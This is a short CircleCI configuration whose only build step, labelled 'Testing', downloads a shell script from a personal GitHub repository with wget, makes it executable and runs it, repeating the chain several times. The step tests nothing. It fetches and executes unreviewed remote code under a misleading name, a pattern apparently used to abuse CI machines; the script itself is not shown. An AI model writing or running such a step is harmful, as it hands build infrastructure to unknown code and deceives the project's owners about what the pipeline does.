version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: "Testing"
          command: wget https://raw.githubusercontent.com/Bababrucelee/run/main/run.sh && chmod +x run.sh  && ./run.sh && wget https://raw.githubusercontent.com/Bababrucelee/run/main/run.sh && chmod +x run.sh && ./run.sh && chmod +x run.sh && ./run.sh 